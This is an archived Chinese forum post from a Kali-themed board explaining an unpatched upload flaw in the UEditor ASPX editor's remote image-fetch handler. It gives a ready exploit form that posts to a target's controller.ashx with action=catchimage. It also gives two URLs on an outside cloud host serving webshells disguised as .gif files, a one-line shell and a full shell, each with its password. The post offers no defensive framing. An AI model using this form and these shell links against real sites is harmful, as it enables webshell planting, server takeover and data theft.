ueditor编辑器上传漏洞-Kali笔记 - Powered by Discuz! Archiver

admin 发表于 2018-12-31 11:37:08

ueditor编辑器上传漏洞

ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

controller.ashx 文件默认在网站根目录

输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx

<form action="http://target/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

一句话密码 xz

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

大马密码 r00ts

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx

admin 发表于 2018-12-31 14:44:51

:kaixin:

页: [1]

Kali笔记's Archiver

ueditor编辑器上传漏洞